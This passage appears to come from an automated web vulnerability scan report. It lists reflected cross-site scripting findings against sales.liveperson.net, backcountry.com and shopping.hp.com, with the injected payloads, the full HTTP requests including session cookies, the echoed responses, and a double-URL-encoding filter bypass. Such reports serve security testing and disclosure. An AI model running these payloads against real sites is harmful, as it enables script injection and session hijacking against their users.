Referer: http://hpproserv.pb.feedroom.com/hp/hpproserv/hpscaleshare/player.swf?Environment=&Site%20ID=hpproserv&SiteName=HP%20Products%20&%20ServicesVideos&SkinName=hpscaleshare&ChannelID=2694b6388b9296446822a583bebf9f8fd966e0b1&StoryID=dfcdd4fb5a3b5230c67fde9d4cde908f365418f7&Volume=5&AutoPlay=false&VideoPlayer.videoPlayer1.StoryLinkURL=http://h30428.www3.hp.com/?fr_story=dfcdd4fb5a3b5230c67fde9d4cde908f365418f7&MoreVideoURL=http://h30428.www3.hp.com/?fr_story=dfcdd4fb5a3b5230c67fde9d4cde908f365418f7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NSC_d12efm_qppm_iuuq=ffffffff09499e4145525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 01:01:11 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
ntCoent-Length: 376
Content-Type: text/html
Cache-Control: private
Content-Length: 376

<A HREF="http://oascentral.feedroom.com/RealMedia/ads/click_lx.ads/hpproserv.com/hpscaleshare/personalcomputingadvancements/744055514/x454abbb"><script>alert(1)</script>df0488ef607/default/empty.gif/4d686437616b3536694b6f41424c3166?x" target="_top">
...[SNIP]...

1.18. http://sales.liveperson.net/hc/9551721/ [msessionkey parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sales.liveperson.net
Path:   /hc/9551721/

Issue detail

The value of the msessionkey request parameter is copied into the HTML document as plain text between tags. The payload fa34b<img%20src%3da%20onerror%3dalert(1)>d1a07869438 was submitted in the msessionkey parameter. This input was echoed as fa34b<img src=a onerror=alert(1)>d1a07869438 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /hc/9551721/?&visitor=5110247826455&msessionkey=8682657700751775312fa34b<img%20src%3da%20onerror%3dalert(1)>d1a07869438&siteContainer=STANDALONE&site=9551721&cmd=mTagKnockPage&lpCallId=120741052087-692197301424&protV=20&lpjson=1&id=7011085767&javaSupport=true&visitorStatus=INSITE_STATUS&dbut=chat-bcs%7Cnull%7ClpChatDynamicChatButtonDiv%7C HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.backcountry.com/mens-clothing
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=8682657700751775312; HumanClickSiteContainerID_9551721=STANDALONE; LivePersonID=LP i=5110247826455,d=1314795678

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 12:15:21 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickKEY=8682657700751775312fa34b<img src=a onerror=alert(1)>d1a07869438; path=/hc/9551721
Set-Cookie: HumanClickKEY=8682657700751775312fa34b<img src=a onerror=alert(1)>d1a07869438; path=/hc/9551721
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Thu, 22 Sep 2011 12:15:21 GMT
Set-Cookie: HumanClickSiteContainerID_9551721=STANDALONE; path=/hc/9551721
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 31316

lpConnLib.Process({"ResultSet": {"lpCallId":"120741052087-692197301424","lpCallConfirm":"","lpJS_Execute":[{"code_id": "webServerOverride", "js_code": "if (lpMTagConfig.lpServer != 'sales.liveperson.n
...[SNIP]...
,{"code_id": "FPCookie", "js_code": "lpMTagConfig.FPC_VID_NAME='9551721-VID'; lpMTagConfig.FPC_VID='5110247826455'; lpMTagConfig.FPC_SKEY_NAME='9551721-SKEY'; lpMTagConfig.FPC_SKEY='8682657700751775312fa34b<img src=a onerror=alert(1)>d1a07869438';lpMTagConfig.FPC_CONT_NAME='HumanClickSiteContainerID_9551721'; lpMTagConfig.FPC_CONT='STANDALONE'"},{"code_id": "SYSTEM!firstpartycookies_compact.js", "js_code": "function lpFirstPartyCookieSupport(
...[SNIP]...

1.19. http://www.backcountry.com/store/cart/add.html [mv_sku parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.backcountry.com
Path:   /store/cart/add.html

Issue detail

The value of the mv_sku request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 64d03"style%3d"x%3aexpression(alert(1))"59a957fd2af was submitted in the mv_sku parameter. This input was echoed as 64d03"style="x:expression(alert(1))"59a957fd2af in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /store/cart/add.html?item_code=BCS0021&mv_order_group=1&mv_todo=refresh&mv_form_profile=option_check&mv_session_id=&mv_order_cat_id=&mv_order_subcat_id=&mv_order_pg_id=&mv_order_catalog_id=&mv_order_is_gift_box=0&is_package=0&is_giftcert=1&mv_javascript=1&mv_sku=64d03"style%3d"x%3aexpression(alert(1))"59a957fd2af&sku_options=1&mv_order_swatch_position=&mv_order_quantity=1&x=61&y=13 HTTP/1.1
Host: www.backcountry.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.backcountry.com/backcountry-gift-certificate-bcs0021
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _msuuid_w4kr1ll1r0=2ABAD7B1-7D08-4A54-B5F7-5E536E68E075; s_cpm=%5B%5B%27Direct%2520Load%27%2C%271316711542269%27%5D%5D; mt.v=1.346469883.1316711542790; s_vi=[CS]v1|273D92EC05013BC2-40000109E026E9CB[CE]; __ar_v4=; rdv_test_group=1; MV_SESSION_ID=TUtKhM3y:nobody:plata:ab0ee0ab; RES_TRACKINGID=841292264887481; siec=true; affiliate_reference_id=R999; __utmx=248652180.; __utmxx=248652180.; s_cc=true; mr_referredVisitor=0; s_sq=%5B%5BB%5D%5D; utag=session_id:1316711948944$_session:1316713377068; c49=PDP%3ABackcountry.com%20Gift%20Certificate

Response

HTTP/1.1 200 OK
Server: Apache
X-Session-Path: Long id in cookie
X-Session-Checked: 1
P3P: CP="IND NON DSP PHY ONL UNI FIN PUR COM INT DEM CNT STA PRE POL CUR ADMa PSAo PSDo IVAo IVDo CONo OUR", policyref="http://www.backcountry.com/w3c/p3p.xml"
Cache-Control: s-maxage=3600
Edge-Cache: max-age=3600
X-HandledBy: grays
Content-Length: 29742
Content-Type: text/html; charset=iso-8859-1
Date: Thu, 22 Sep 2011 12:12:46 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: MV_SESSION_ID=TUtKhM3y:nobody:plata:ab0ee0ab; path=/; expires=Sun, 19-Sep-2021 12:12:46 GMT
Set-Cookie: CART=mi%3d500%3bq%3d1%3bpr%3d125%2e00%3bsku%3dBCS0021%2dBCSGC125%2dONSI%3bhasbox%3d0%3b%23mi%3d500%3bq%3d1%3bpr%3d125%2e00%3bsku%3dBCS0021%2dBCSGC125%2dONSI%3bhasbox%3d0%3b%23; path=/; expires=Sun, 19-Sep-2021 12:12:46 GMT
Set-Cookie: siec=false; path=/; expires=Tue, 21-Sep-2021 22:12:46 GMT
Set-Cookie: affiliate_reference_id=R999; path=/; expires=Tue, 21-Sep-2021 22:12:46 GMT
Set-Cookie: omn_cookie=; path=/; expires=Thu, 01-Jan-1970 00:00:12 GMT
Set-Cookie: tr_template=; path=/; expires=Fri, 23-Sep-2011 12:12:46 GMT
Set-Cookie: cart_cross_sell=; path=/; expires=Thu, 01-Jan-1970 00:00:12 GMT
Set-Cookie: saw_content_upload=; path=/; expires=Thu, 01-Jan-1970 00:00:12 GMT
Set-Cookie: saw_poos=; path=/; expires=Thu, 01-Jan-1970 00:00:12 GMT
Set-Cookie: saw_order_detail=; path=/; expires=Thu, 01-Jan-1970 00:00:12 GMT
Set-Cookie: promo_nav=; path=/; expires=Sun, 19-Sep-2021 12:12:46 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphp
...[SNIP]...
<input type="hidden" name="mv_sku" value="64d03"style="x:expression(alert(1))"59a957fd2af" />
...[SNIP]...

1.20. http://www.shopping.hp.com/design [jumpid parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.shopping.hp.com
Path:   /design

Issue detail

The value of the jumpid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e99c0'%3b814e131ae4d was submitted in the jumpid parameter. This input was echoed as e99c0';814e131ae4d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /design?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_accessoriese99c0'%3b814e131ae4d HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.shopping.hp.com/go/touchpadfaqs;HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_tablet_home
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; OV_VISTA_2009_04_09=0; hpcomsh_usen=s1=xss%20printer&s1_context=hpcomsearch&s2=xss+printer&s2_context=hhostore&s3=xss&s3_context=hpcomsearch; mbox=session#1316670895509-389686#1316672894|check#true#1316671094; s_pn=gw:us:en-us:home; s_re=ams; lang=en-us; cc=us; OAX=Mhd7ak56iIkAATNs; s_var_20=in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping; jumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961899'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280650'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282219'%5D%5D; ijumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961900'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280652'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282221'%5D%5D; hpshopping=1&user_id=mlksgt%2BT3Ap7MSrqvlvccAyb0ic%3D&home_slot_1=BV704AA%23ABA%7CLP011AV%23ABA&home_slot_1_type=0%7CCTO&home_slot_1_category=0%7Cdesktops%2Fp7xt_series&home_slot_1_Affix=0%7CGS&cart_id=1603777571; _rmc_n=2; HHOJSID=LRgpT6MFm4zJCr4b99PqVpYCwCngnLth4hy6S0fnYbY2fBYN5tNm!133787182; prop12=r602; EMID=; s_depth=21; hp_cust_seg_sel=HHO; gpv_pN=hho%3Ags%3Ampr%3Aportal%3Amain; s_cc=true; hpcompc_usen=cartExists=true; HP_EBUS=true; HP_EBUS_HP_CLICKS=4x19x11121; s_sq=hphqglobal%2Chphqna%2Chphqhhorollup%2Chphqnahpshopping%3D%2526pid%253Dhho%25253Ags%25253Alanding%25253Astatic%25253Atouchpadfaqs%2526pidt%253D1%2526oid%253D%25252Fdesign_jumpid%25253Din_R329_prodexp%25252Fhhoslp%25252Fpsg%25252Flateralnav_accessories_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 01:18:20 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpcompc_usen=cartExists=true; domain=.hp.com; expires=Friday, 20-Jan-2012 01:18:21 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 149144

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html lang="en">
<head>
<!-- hps_he
...[SNIP]...
= 'hho:gs:landing:Electronics &amp; Accessories Deals';
if (s_pageName != null) s_pageName = s_pageName.toLowerCase();
var s_prop4 = 'in_R329_prodexp/hhoslp/psg/lateralnav_accessoriese99c0';814e131ae4d|Electronics &amp; Accessories Deals';
var s_prop21 = 'Electronics &amp; Accessories Deals||0|';

var omni_landing = 'design_center';
var omni_landing_value = omni_landing;
switch(omn
...[SNIP]...

1.21. http://www.shopping.hp.com/desktops [HHOJSID parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.shopping.hp.com
Path:   /desktops

Issue detail

The value of the HHOJSID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4923e'%3b1cd62d1ca9e was submitted in the HHOJSID parameter. This input was echoed as 4923e';1cd62d1ca9e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /desktops;HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_desktops_home4923e'%3b1cd62d1ca9e HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.shopping.hp.com/webapp/shopping/home.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hpcomsh_usen=s1=xss&s1_context=hpcomsearch; s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; mbox=check#true#1316670956|session#1316670895509-389686#1316672756; s_pn=gw:us:en-us:home; s_re=ams; HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182; hpshopping=1&user_id=mlkpjNmR0Qt%2BNyntuVfacgSd0ic%3D; hpcompc_usen=cartExists=false; lang=en-us; cc=us; OV_VISTA_2009_04_09=0; EMID=; s_depth=2; hp_cust_seg_sel=HHO; gpv_pN=hho%3Ags%3Ahome; s_cc=true; s_sq=%5B%5BB%5D%5D; HP_EBUS_HP_CLICKS=1x1x1

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 00:55:05 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlkqgtqf2Qt7MiHjv1bYeQeXlmvi; expires=Friday, 20-Jan-2012 00:55:06 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 20-Jan-2012 00:55:06 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 208180


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html lang="en">
<head>
   <!--
...[SNIP]...
String(omni_subcat1)) omni_subcat1 = '';

var s_prop21 = '|' + omni_category + '|' + omni_catLevel + '|' + omni_subcat1;
var s_prop4 = 'in_R329_prodexp/hhoslp/psg/lateralnav_desktops_home4923e';1cd62d1ca9e|';
var s_channel = omni_landing;
var s_prop25 = omni_landing + ':main';
var s_pageName = 'hho:gs:landing:cs:' + omni_landing;
var s_eVar23 = (isComputerStore(s_channel)) ? s_channel :
...[SNIP]...

1.22. http://www.shopping.hp.com/esp [HHOJSID parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.shopping.hp.com
Path:   /esp

Issue detail

The value of the HHOJSID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d8e87'%3bf56825840e5 was submitted in the HHOJSID parameter. This input was echoed as d8e87';f56825840e5 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /esp;HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_services_homed8e87'%3bf56825840e5 HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.shopping.hp.com/webapp/shopping/home.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hpcomsh_usen=s1=xss&s1_context=hpcomsearch; s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; mbox=check#true#1316670956|session#1316670895509-389686#1316672756; s_pn=gw:us:en-us:home; s_re=ams; HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182; lang=en-us; cc=us; OV_VISTA_2009_04_09=0; EMID=; s_depth=3; s_var_20=in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home; hp_cust_seg_sel=HHO; gpv_pN=hho%3Ags%3Alanding%3Acs%3Adesktops; jumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home'%2C'1316670949238'%5D%5D; ijumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home'%2C'1316670949239'%5D%5D; s_cc=true; s_sq=%5B%5BB%5D%5D; hpshopping=1&user_id=mlkpiNuW0Ql6Oijjs1beeACYlmvi; hpcompc_usen=cartExists=false; HP_EBUS_HP_CLICKS=2x2x8

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 00:55:13 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlkjitiT3gpxNi7qulPaeAKc0ic%3D&s1=xss+printer; expires=Friday, 20-Jan-2012 00:55:14 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 20-Jan-2012 00:55:14 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 168020


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html lang="en">
<head>
   <!--
...[SNIP]...
g = 'esp';

var s_pageName = 'hho:gs:landing:Services';
if (s_pageName != null) s_pageName = s_pageName.toLowerCase();
var s_prop4 = 'in_R329_prodexp/hhoslp/psg/lateralnav_services_homed8e87';f56825840e5|Services';
if ( omni_landing == 'printer' || omni_landing == 'photography' || omni_landing == 'handheld' || omni_landing == 'outlet' )
{
var s_prop21 = "Services |" + omni_category + "|"
...[SNIP]...

1.23. http://www.shopping.hp.com/printer [HHOJSID parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.shopping.hp.com
Path:   /printer

Issue detail

The value of the HHOJSID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 12eb7'%3b575b1aa8f4d was submitted in the HHOJSID parameter. This input was echoed as 12eb7';575b1aa8f4d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /printer;HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182?jumpid=in_R329_prodexp/hhoslp/ipg/lateralnav_printers_home12eb7'%3b575b1aa8f4d HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.shopping.hp.com/webapp/shopping/home.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hpcomsh_usen=s1=xss&s1_context=hpcomsearch; s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; mbox=check#true#1316670956|session#1316670895509-389686#1316672756; s_pn=gw:us:en-us:home; s_re=ams; HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182; lang=en-us; cc=us; OV_VISTA_2009_04_09=0; hpshopping=1&user_id=mlksj9iT3wN6My%2FvuVvfeAGd0ic%3D; hpcompc_usen=cartExists=false; EMID=; s_depth=4; s_var_20=in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_tablet_home; hp_cust_seg_sel=HHO; gpv_pN=hho%3Ags%3Alanding%3Astatic%3Atouchpadfaqs; jumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home'%2C'1316670949238'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_tablet_home'%2C'1316670953100'%5D%5D; ijumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home'%2C'1316670949239'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_tablet_home'%2C'1316670953101'%5D%5D; s_cc=true; s_sq=%5B%5BB%5D%5D; HP_EBUS_HP_CLICKS=3x3x12

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 00:55:21 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlkqj92f2A14MinpvVHWcQCenGvi&s1=xss+printer&s2=xss+printeredf6ffb93d89de9464acd56a&s3=edf6ffb9384ae95321d80a57; expires=Friday, 20-Jan-2012 00:55:21 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 20-Jan-2012 00:55:21 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 199557


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html lang="en">
<head>
   <!--
...[SNIP]...
var s_pageName = 'hho:gs:landing:Printers & all-in-ones';
if (s_pageName != null) s_pageName = s_pageName.toLowerCase();
var s_prop4 = 'in_R329_prodexp/hhoslp/ipg/lateralnav_printers_home12eb7';575b1aa8f4d|Printers & all-in-ones';
if ( omni_landing == 'printer' || omni_landing == 'photography' || omni_landing == 'handheld' || omni_landing == 'outlet' )
{
var s_prop21 = "Printers & all-in-o
...[SNIP]...

1.24. http://www.shopping.hp.com/scat/desktops/p7xt_series/rts/3/computer_store [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.shopping.hp.com
Path:   /scat/desktops/p7xt_series/rts/3/computer_store

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6259d%2522%2520a%253db%25208dcb49babd8 was submitted in the REST URL parameter 5. This input was echoed as 6259d" a=b 8dcb49babd8 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

POST /scat/desktops/p7xt_series/rts/36259d%2522%2520a%253db%25208dcb49babd8/computer_store HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
Content-Length: 0
Cache-Control: max-age=0
Origin: http://www.shopping.hp.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.shopping.hp.com/webapp/shopping/store_access.do?template_type=series_detail&category=desktops&series_name=p7xt_series&jumpid=in_R329_prodexp/hhoslp/psg/desktops/promo_tile/1/dt_promo_tile1_Budget_Friendly_921
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
